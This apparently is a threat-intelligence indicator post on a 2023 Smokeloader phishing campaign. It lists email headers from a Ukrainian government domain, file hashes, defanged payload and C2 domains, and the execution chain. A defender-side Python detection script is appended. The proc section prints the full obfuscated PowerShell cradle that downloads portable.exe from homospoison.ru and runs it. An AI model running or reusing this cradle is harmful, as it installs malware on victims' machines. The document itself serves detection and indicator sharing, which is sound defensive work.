- #IOC #OptiData #VR #smokeloader #ZIP #JS
- https://pastebin.com/RDVXCe0J
- previous_contact:
- https://pastebin.com/QpG70u8T
- https://pastebin.com/BJzcXqkK
- https://pastebin.com/kBW7nkZ5
- https://pastebin.com/Z7zq0YkW
- https://pastebin.com/b8PkhMyN
- https://pastebin.com/hkskwKvc
- https://pastebin.com/JmthzrL4
- https://pastebin.com/1scwT0f8
- https://pastebin.com/MP3kCSSh
- FAQ:
- https://radetskiy.wordpress.com/2018/10/19/ioc_smokeloader_111018/
- https://research.checkpoint.com/2019-resurgence-of-smokeloader/
- attack_vector
- --------------
- email attach .zip? > JS > WSH > PowerShell > GET 1URL > exe
- # # # # # # # #
- email_headers
- # # # # # # # #
- Return-Path: <prvs=14880d1fa8=inbox6@dl.kr-admin.gov.ua>
- Received: from kr-admin.gov.ua (mail.kr-admin.gov.ua [195.62.15.59])
- Received: from [127.0.0.1] by kr-admin.gov.ua (MDaemon PRO v9.6.1)
- Reply-To: stroybuts@ukr.net
- From: inbox6@dl.kr-admin.gov.ua
- Subject: рахунок від 02.05.2023
- Message-Id: <7D5F7EBF-2F2B-D454-AC28-B86320169DD9@dl.kr-admin.gov.ua>
- Date: Thu, 4 May 2023 07:23:20 +0300
- X-Mailer: iPad Mail (13E238)
- X-Authenticated-Sender: inbox6@dl.kr-admin.gov.ua
- # # # # # # # #
- files
- # # # # # # # #
- SHA-256 352974cfdf1a7e182180f8c813a159ae44bb35268d76fae91ab64139be9200bd
- File name pax_2023_AB1058.zip [ Zip archive data, at least v2.0 to extract ]
- File size 955.61 KB (978548 bytes)
- SHA-256 3c4440dde25ead7074bf3bf90aed31844310c3f1da90ff7e20922fad4c3eab25
- File name pax_2023_AB1058.pdf [ PDF document, version 1.7 ]
- File size 1.13 MB (1180511 bytes)
- SHA-256 f4e72685fb3efa5bad200451d36c7d1e72a94515c515bdbb09c00254dca289ea
- File name pax_2023_AB1058..js [ JavaScript ]
- File size 28.29 KB (28967 bytes)
- SHA-256 cd0226a2b9c38ab99f2bbe4461b7fc9d4b07faafbe1ccc53d92bf08d1903a8ae
- File name portable.exe (TempgEq94.exe) [ PE32 executable for MS Windows ]
- File size 263.50 KB (269824 bytes)
- # # # # # # # #
- activity
- # # # # # # # #
- PL_SCR http://homospoison{ .ru/one/portable.exe [193.106.175.177]
- C2
- http://coudzoom{ .ru/
- http://balkimotion{ .ru/
- http://ligaspace{ .ru/
- http://ipodromlan{ .ru/
- http://redport80{ .ru/
- http://superboler{ .com/
- http://lamazone{ .site/
- http://criticalosl{ .tech/
- http://3dstore{ .pro/
- http://humanitarydp{ .ug/
- http://shopersport{ .ru/
- http://sindoproperty{ .org/
- http://maximprofile{ .net/
- http://zaliphone{ .com/
- netwrk
- --------------
- 193.106.175.177 homospoison.ru 80 HTTP GET /one/portable.exe HTTP/1.1 Google Chrome
- comp
- --------------
- powershell.exe 193.106.175.177 homospoison.ru
- proc
- --------------
- "C:\Windows\System32\WScript.exe" "C:\Users\operator\Desktop\pax_2023_AB1058..js"
- "C:\Windows\System32\cmd.exe" /c pO^wErshEll -executionpolicy bypass -noprofile -w hidden $v1='Net.We'; $v2='bClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://homospoison{ .ru/one/portable.exe','%temp%gEq94.exe'); & %temp%gEq94.exe & ZJHYOcunksxSdyp
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOwErshEll -executionpolicy bypass -noprofile -w hidden $v1='Net.We'; $v2='bClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://homospoison{ .ru/one/portable.exe','C:\Users\support\AppData\Local\TempgEq94.exe');
- C:\Users\support\AppData\Local\TempgEq94.exe
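- As an added, defender-side example (not part of the original post or of any referenced write-up): a small Python script that refangs the post's `{ .` notation into usable indicators and flags process-creation events matching the WScript > cmd > PowerShell download chain listed in the proc section. The event records are constructed from the command lines above, the field names `parent`, `image` and `cmdline` are assumptions rather than a real EDR schema, and only a subset of the C2 domains is embedded. The point of the normalisation steps is that caret escapes, mixed case and split string literals (`'Net.We'` + `'bClient'`) are exactly what defeats a naive substring match on the raw command line.

```python
import re
from urllib.parse import urlparse

# A few of the indicators from the post, kept in its defanged "{ ." notation.
DEFANGED_IOCS = [
    "http://homospoison{ .ru/one/portable.exe",
    "http://coudzoom{ .ru/",
    "http://balkimotion{ .ru/",
    "http://ligaspace{ .ru/",
]

# Constructed process-creation events modelled on the proc section of the post.
# Field names are assumptions, not a real telemetry schema. The second event
# keeps the post's defanged URL; refang() undoes that before matching.
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "WScript.exe",
     "cmdline": r'"C:\Windows\System32\WScript.exe" "C:\Users\operator\Desktop\pax_2023_AB1058..js"'},
    {"parent": "WScript.exe", "image": "cmd.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /c pO^wErshEll -executionpolicy bypass -noprofile -w hidden '
                r"$v1='Net.We'; $v2='bClient'; $var = (New-Object $v1$v2); "
                r"$var.Headers['User-Agent'] = 'Google Chrome'; "
                r"$var.downloadfile('http://homospoison{ .ru/one/portable.exe','%temp%gEq94.exe'); & %temp%gEq94.exe"},
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": r'powershell.exe -NoProfile -Command "Get-ChildItem C:\Users\support\Documents"'},
]


def refang(text):
    """Undo the post's defanging: 'example{ .ru' -> 'example.ru'."""
    return re.sub(r"\{\s*\.", ".", text)


def ioc_domains(iocs):
    """Hostnames of the refanged IOC URLs, for matching against telemetry."""
    return {urlparse(refang(u)).hostname for u in iocs}


def normalize_cmdline(cmdline):
    """Drop cmd.exe caret escapes and lower-case, so pO^wErshEll reads as powershell."""
    return cmdline.replace("^", "").lower()


def joined_literals(cmdline):
    """Concatenate all single-quoted literals so 'Net.We'+'bClient' shows up as net.webclient."""
    return "".join(re.findall(r"'([^']*)'", cmdline)).lower()


def score_event(event, bad_domains):
    """Return the list of reasons this event matches the observed chain (empty if none)."""
    reasons = []
    cmd = normalize_cmdline(refang(event["cmdline"]))
    if event["parent"].lower() == "wscript.exe" and "powershell" in cmd:
        reasons.append("wscript.exe spawning PowerShell")
    if "-executionpolicy bypass" in cmd and "-w hidden" in cmd:
        reasons.append("hidden window with execution policy bypass")
    if "downloadfile" in cmd or "net.webclient" in cmd or "net.webclient" in joined_literals(cmd):
        reasons.append("WebClient download cradle (literal splitting resolved)")
    if re.search(r"&\s*%temp%", cmd):
        reasons.append("executes freshly dropped file from %temp%")
    hosts = set(re.findall(r"https?://([^/'\"\s]+)", cmd))
    hit = hosts & bad_domains
    if hit:
        reasons.append("contacts known payload/C2 domain: " + ", ".join(sorted(hit)))
    return reasons


def scan(events, bad_domains):
    """(index, reasons) for every event that matched at least one rule."""
    flagged = []
    for idx, event in enumerate(events):
        reasons = score_event(event, bad_domains)
        if reasons:
            flagged.append((idx, reasons))
    return flagged


if __name__ == "__main__":
    bad = ioc_domains(DEFANGED_IOCS)
    for idx, reasons in scan(SAMPLE_EVENTS, bad):
        print(f"event {idx} ({SAMPLE_EVENTS[idx]['image']}): " + "; ".join(reasons))
```

- Only the cmd.exe event trips the rules; the benign PowerShell listing and the initial WScript launch stay quiet. In production the domain set would come from the full IOC list and the parent/child relationship from real process telemetry, but the normalisation (caret stripping, lower-casing, literal joining) is what makes the obfuscated invocation in the proc section matchable at all.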
- persist
- --------------
- n/a
- drop
- --------------
- C:\Users\%username%\AppData\Local\TempgEq94.exe
- # # # # # # # #
- additional info
- # # # # # # # #
- TTPs: Query Registry System Information Discovery
- wscript.exe \REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation
- TTPs: Email Collection
- explorer.exe \REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
- \REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
- \REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
- # # # # # # # #
- VT & Intezer
- # # # # # # # #
- https://www.virustotal.com/gui/file/352974cfdf1a7e182180f8c813a159ae44bb35268d76fae91ab64139be9200bd/details
- https://www.virustotal.com/gui/file/3c4440dde25ead7074bf3bf90aed31844310c3f1da90ff7e20922fad4c3eab25/details
- https://www.virustotal.com/gui/file/f4e72685fb3efa5bad200451d36c7d1e72a94515c515bdbb09c00254dca289ea/details
- https://www.virustotal.com/gui/file/cd0226a2b9c38ab99f2bbe4461b7fc9d4b07faafbe1ccc53d92bf08d1903a8ae/details
- https://analyze.intezer.com/analyses/27e7086e-09d8-4998-9e25-06c41e34a42d
- VR